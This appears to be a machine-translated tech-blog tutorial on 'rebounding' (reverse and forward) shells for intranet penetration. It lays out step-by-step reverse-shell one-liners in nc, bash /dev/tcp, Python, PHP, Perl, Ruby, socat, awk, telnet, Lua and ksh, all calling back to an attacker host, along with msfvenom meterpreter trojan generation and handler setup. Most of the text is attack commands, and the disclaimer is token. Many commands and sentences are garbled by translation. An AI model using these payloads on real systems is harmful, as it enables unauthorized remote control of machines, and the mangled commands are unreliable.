Shulou(Shulou.com)05/31 Report--

This article will explain in detail the example analysis of rebounding shell in intranet penetration. The editor thinks it is very practical, so I share it with you for reference. I hope you can get something after reading this article.

Disclaimer: the article technology is only for use by network security technicians and white hats, and cannot be used by any individual or organization

Once a crime is found, it shall be directly reported to the state security organ for handling.

Rebound shell

Bounce shell:

Get the command line of the victim's machine on the attacker's machine.

Background:

Have a more in-depth understanding of the intranet, understand the organizational structure of the intranet, in order to better intranet penetration.

Forward rebound shell: purpose:

Use the shell of the nc forward connection to the target server to obtain the control rights of the target server (dmz large shooting range)

Premise:

An attacker can access (connect to) the target (open) port of the web server, and the web server firewall does not block the attacker's inbound traffic. Suitable for the open port that can access the controlled machine.

Experimental environment:

Physical machine (attack plane):

Target server (public network windows): *. * * .88.201201666

Network Topology:

The steps of the experiment:

Step 1:

Actively connect to the controlled host shell, and use nc to listen on port 6666 on the controlled host. After successfully rebounding shell, you will control the cmd.exe program of the target server (as long as you connect to port 6666 of the target server, cmd.exe will be executed). The result is shown below:

Command:

# the controlled host is Windows, use the following command: nc.exe-lvp 4444-e cdm.exe# controlled host is linux, use the following command: nc-lvp 4444-e / bin/bash

The following picture shows the controlled host:

Step 2:

The attack plane connects to port 6666 of the target server, and the result is shown below:

Command:

# attacker: # nc-vv controlled server ip 4444nc-vv *. * *. 88.201 6666

The following figure shows the attacker host:

Reverse rebound shell: purpose:

Use nc to reverse bounce shell to the attacker's local to gain control of the target server (dmz large shooting range)

Premise:

1. The firewall releases outbound traffic from the web server (the controlled host).

2. The attacker must have a public network ip.

Experimental environment:

Attack machine (public network kali): *. * .23.106 VR 9999

Controlled machine (public network windows):

Network Topology:

The steps of the experiment:

Step 1:

The attacker's public network vps listens for port 9999:

The attacker kali (public network ip) listens on local port 9999, and the controlled host bounces shell to port 9999 of kali (public network ip). The result is as follows:

Command:

# attack machine (public network kali): * *. * *. 23.106:9999nc-lvvp 9999

The following figure shows the public network kali:

Step 2:

Bounce the shell of the controlled host to port 9999 of the attacker kali, as shown in the following figure:

Command:

# nc-e / bin/bash attacker Public Network ip 9999 (bounce linux shell) # nc-e cmd.exe attacker Public Network ip 9999 (bounce windows shell)

The following picture shows the controlled host:

Step 2:

Check the kali to display the shell of the target server that successfully rebounded, as shown in the following figure:

Analysis:

If the rebound is successful, the attacker needs to open the listening port of the public network kali and let the firewall release the traffic passing through port 9999.

The attacker needs to have the public network ip of the attacker, and the traffic of the attacker can come out.

Other ways to rebound shell:msf bounce: experimental environment:

Attack machine (public network kali): *. * .23.106 VR 9999

Controlled host (virtual machine win8):

The steps of the experiment:

Step 1:

The attacker's public network vps listens for port 9999:

The attacker uses the msfconsole of msf on the public network kali (public network ip) to listen for the rebound of the Trojan horse on port 9999. The result is as follows:

Command:

# attack machine (public network kali): *. 23.106:9999msfconsole use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost *. 23.106:9999set lport 9999

Step 3:

Generate a rebound Trojan, and upload the generated Trojan to the controlled host (virtual machine win8), and click run to make the controlled host bounce shell to port 9999 of kali (public network ip), as shown below:

Command:

# generate rebound Trojan using msfvenom: msfvenom-p windows/x64/meterpreter/reverse_tcp lhost=***.***.23.106:9999lport=9999-f exe-o test.exe# here uses finalshell to remotely connect to the public network kali, so use the sz command to download the generated Trojan to the physical machine: under sz test.exe#, put the downloaded Trojan file to the controlled host (virtual machine win8).

Step 3:

On the controlled host (virtual machine win8), click to run test.exe (this Trojan file), and view the public network kali rebound, as shown below:

Bash rebound: experimental environment:

Attack machine (public network kali):.. 23.106 purl 9999

Controlled machine (virtual machine centos6.5):

Experimental steps: receiver (attacker ip, public network): nc-lvvp port sender (controlled host): bash-I > & / dev/tcp/ attacker ip (public network) / attacker port 0 > & 1 sender (controlled host): 0room31

Step 1:

In order to keep the environment close to the actual combat, keep the firewall on. (rebounding shell has positive and reverse, 90% of us are reverse bouncing shell.

Under normal circumstances, attackers cannot forward connect to the target server; apart from opening port 22, they can connect through ssh, but we do not know the account password for ssh; our main purpose is to obtain the reverse shell of the target host, so the firewall can not be turned off. Just turn off setenforce (setlinux) and check the firewall status, as shown in the following figure:

Command:

# turn off setlinuxsetenforce to view firewall status: service iptables status

Step 2:

The attacker's public network vps listens for port 9999:

The attacker kali (public network ip) listens on local port 9999, and the controlled host bounces shell to port 9999 of kali (public network ip). The result is as follows:

Command:

# attack machine (public network kali): * *. * *. 23.106:9999nc-lvvp 9999

Command:

Bash-I > & / dev/tcp/***.***.23.106/9999 0 > & 1

Step 3:

On the controlled machine (virtual machine centos6.5), use bash to bounce shell onto the attacker's public network kali, and check the public network kali bounce, as shown below:

Python rebound: experimental environment:

Attack machine (public network kali): *. * .23.106 VR 9999

Controlled machine (virtual machine centos6.5):

Experimental steps: receiver (attacker ip, public network): nc-lvvp port sender (accused host): python-c 'import socket,subprocess,os;s=socket.socket (socket.AF_INET,socket.SOCK_STREAM); s.connect (("attacker public network ip", attacker public network listening port)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2) P=subprocess.call (["/ bin/bash", "- I"]);

Step 1:

The attacker's public network vps listens for port 9999:

The attacker kali (public network ip) listens on local port 9999, and the controlled host bounces shell to port 9999 of kali (public network ip). The result is as follows:

Command:

# attack machine (public network kali): * *. * *. 23.106:9999nc-lvvp 9999

Step 2:

On the controlled machine (virtual machine centos6.5), use python to bounce shell onto the attacker's public network kali, and check the public network kali bounce, as shown below:

Command:

Python-c 'import socket,subprocess,os;s=socket.socket (socket.AF_INET,socket.SOCK_STREAM); s.connect (("*. * *. 23.106", 9999)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p=subprocess.call (["/ bin/bash", "- I"]);'

Php rebound: experimental environment:

Attack machine (public network kali): *. * .23.106 VR 9999

Controlled machine (virtual machine centos6.5):

Experimental steps: receiver (attacker ip, public network): nc-lvvp port sender (controlled host): bash-I > & / dev/tcp/ attacker ip (public network) / attacker port 0 > & 1 sender (controlled host): php-r'$sock=fsockopen ("attacker ip", port); exec ("/ bin/sh-I & 32 > & 3");'

Step 1:

The attacker's public network vps listens for port 9999:

The attacker kali (public network ip) listens on local port 9999, and the controlled host bounces shell to port 9999 of kali (public network ip):

Command:

# attack machine (public network kali): * *. * *. 23.106:9999nc-lvvp 9999

Step 2:

On the controlled machine (virtual machine centos6.5), use php to bounce shell onto the attacker's public network kali, and check the public network kali rebound:

Command:

Php-r'$sock=fsockopen ("* *. * *. 23.106", 9999); exec ("/ bin/bash-I & 32 > & 3"); 'perl rebound: experimental environment:

Attack machine (public network kali): *. * .23.106 VR 9999

Controlled machine (virtual machine centos6.5):

Experimental steps: receiving end (attacker ip, public network): nc-lvvp port sender: perl-e 'use Socket;$i= "attacker ip"; $pamph8080 socket (Sforce PFpendINETgrad SOCKSTREAML getprotobyname ("tcp")); if (connect (STDIN, "> & S")) {open (STDIN, "> & S"); open (STDERR, "> & S"); exec ("/ bin/bash-I") };'

Step 1:

The attacker's public network vps listens for port 9999:

The attacker kali (public network ip) listens on local port 9999, and the controlled host bounces shell to port 9999 of kali (public network ip). The result is as follows:

Command:

# attack machine (public network kali): * *. * *. 23.106:9999nc-lvvp 9999

Step 3:

On the controlled machine (virtual machine centos6.5), use bash to bounce shell onto the attacker's public network kali, and check the public network kali bounce, as shown below:

Command:

Perl-e'socket "* *. *. 23.106"; $pendant 9999 socket (SGramPFwithINETGravity SOCKSTREAMReceiving getprotobyname ("tcp")); if (connect (sockaddrystin ($pmae inetyogaton ($I) {open (STDIN, "> & S"); open (STDOUT, "> & S"); open (STDERR, "> & S"); exec ("/ bin/bash-I");};';

Linux bounce shell pose collection:

When bouncing shell on the target server (linux), you can check whether the corresponding program is installed on the target server by using the following command:

Command:

# for example, check whether the php service is installed on the target server: rpm-Q php

Linux bounce shell summary 1. 1 send file\ (public network sent intranet\) file sender: nc\-lp 6666

< 文件文件接收端：nc 发送端ip 发送端端口 \>

New file 1. 2 send file\ (intranet sending public network\) File sender: nc\-lp 6666\ > File receiver: nc sender ip sender port

< 新文件2\.聊天发送端：nc \-lp 6666接收端：nc 发送端ip 发送端端口3\.1发送shell发送端\(公网服务器\)：nc \-lvvp 6666 \-e /bin/bash接收端：nc 发送端ip 发送端攻击者ip3\.2反弹shell接收端：nc \-lvvp 6666发送端\(内网网服务器\)：nc 接收端ip 接收端端口 \-e /bin/bash4\.bash反弹接收端\(hackip\,公网\)：nc \-lvvp 端口发送端\(受害者\)：bash \-i \>

& / dev/tcp/111\ .230\ .170\ .95Universe 99850\ > & 1 sender\ (victim\): 0room315\ .1socat bounce\ (tcp\) receiver\ (attack machine\):\. / socat TCP\-LISTEN: Port\-sender\ (target machine\):\. / socat exec:'bash\-li'\, pty\, stderr\, setsid\, sigint\ Sane tcp: attack machine ip: attack machine port 5\ .2socat bounce\ (udp\) receiver: nc\-lvvp 8080 sender: socat udp\-connect: attacker ip: port exec:'bash\-li'\, pty\, stderr\, sane 2\ > & 1\ > / dev/null & 6\ .python bounce receiver\ (attack machine\, public network\): nc\-lvvp port sender\ (target machine\): python\-c 'import socket\, subprocess\, os S=socket\ .socket\ (socket\ .AF\ _ INET\, socket\ .sock\ _ STREAM\); s\ .connect\ (("receiver ip"\, receiver port\)\); os\ .dup2\ (s\ .fileno\ (\)\, 0\); os\ .dup2\ (s\ .fileno\ (\), 1\); os\ .dup2\ (s\ .fileno\ (\), 2\) P=subprocess\ .call\ (\ ["/ bin/sh"\, "\-I"\]\);'7\ .PHP bounce receiver: nc\-lvvp port sender: php\-r'$sock=fsockopen\ ("attacker ip", port\); exec\ ("/ bin/sh\-I & 3 2\ > & 3"\) '8\ .Java bounce receiver: nc\-lvvp port sender: r = Runtime\ .getRuntime\ (\) p = r\ .exec\ (\ ["/ bin/bash"\, "\-c"\, "exec 5/dev/tcp/ attacker ip/ port; cat & 5\ > & amp5; done"\] as String\ [\]\) p\ .waitFor\ (\) 9\ .Perl bounce receiver: nc\-lvvp port sender: perl\-e' use Socket $I = "attacker ip"; $pendant 8080 political socket\ (S\, PF\ _ INET\, SOCK\ _ STREAM\, getprotobyname\ ("tcp"\); if\ (connect\ (S\, sockaddr\ _ in\ ($p\, inet\ _ aton\ ($I\)\ {open\ (STDIN\, "\ > & S"\); open\ (STDOUT\, "\ > & S"\); open\ (STDERR\, "\ > & S"\) Exec\ ("/ bin/sh\-I"\);\};'10\ .ruby bounce receiver: nc\-lvvp port sender: ruby\-rsocket\-e'exit if fork;c=TCPSocket\ .new\ ("attacker ip"\, "port"\); while\ (cmd=c\ .gets\) IO\ .popen\ (cmd\, "r"\)\ {\ | io\ | c\ .print io\ .read\} end'11\ .telnet bounce receiver: nc\-lvvp port sender: mknod backpipe p & & telnet attacker ip port 0backpipe12\ .lua bounce\ (install lua environment: apt\-get install lua\ *) receiver: nc\-e "local s=require\ ('socket'\); local t=assert\ (s\ .tcp\ (\)\) T:connect\ ('attacker ip'\, port\); while true do local r\, x=t:receive\ (\); local f=assert\ (io\ .popen\ (r\,' r'\)\); local b=assert\ (f:read\ ('* a'\)\); t:send\ (b\); end;f:close\ (\); t:close\ (\) "13\ .awk bounce receiver: nc\-lvvp port sender: awk 'BEGIN\ {s =" / inet/tcp/0/ attacker ip/ port "; while\ (1\)\ {do\ {s\ | & getline getline if\ (c\)\ {while\ (c\ | & getline\)\ > 0\) print $0\ | & amps;close\ (c\)\} while\ (c\! =" exit "\) Close\ (s\)\}'14\ .ksh bounce receiver: nc\-lvvp port sender: ksh\-c 'ksh\ > / dev/tcp/ attacker ip/ port 2 > & 1

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.